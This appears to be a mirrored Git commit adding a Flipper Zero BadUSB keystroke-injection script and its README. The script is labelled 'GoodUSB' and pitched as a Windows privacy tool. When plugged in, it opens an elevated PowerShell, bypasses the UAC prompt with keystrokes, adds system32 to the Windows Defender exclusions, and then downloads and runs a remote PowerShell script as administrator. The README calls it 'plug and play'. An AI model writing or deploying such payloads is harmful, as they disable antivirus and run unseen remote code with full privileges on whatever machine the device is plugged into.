mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2026-09-18 19:21:30 +00:00
Adding lost UNC0V3R3D BadUSB Collection
This commit is contained in:
@@ -0,0 +1,19 @@
|
||||
REM Author: UNC0V3R3D
|
||||
REM Description: Want to feel the privacy on Windows?
|
||||
REM Version: 1.0
|
||||
REM Category: GoodUSB
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell Start-Process powershell -Verb runAs
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
SHIFT TAB
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/UNC0V3R3D/ressources/blob/main/privacy.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
|
||||
ENTER
|
||||
@@ -0,0 +1,36 @@
|
||||
|
||||
# privacy
|
||||
This script will download and execute a large script that removes features that likely do not provide much privacy.
|
||||
|
||||
## How to use?
|
||||
|
||||
This script is plug and play.
|
||||
|
||||
|
||||
## Features
|
||||
|
||||
- open powershell
|
||||
- download ps1 script
|
||||
- provide privacy
|
||||
|
||||
|
||||
## Feedback
|
||||
|
||||
If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Support
|
||||
|
||||
For support, contact me via Discord "UNC0V3R3D#8662".
|
||||
|
||||
|
||||
## Meta
|
||||
|
||||
|
||||
- If you want to sponsor me on Patreon, the link is on my profile.
|
||||
|
||||
|
||||
Reference in New Issue
Block a user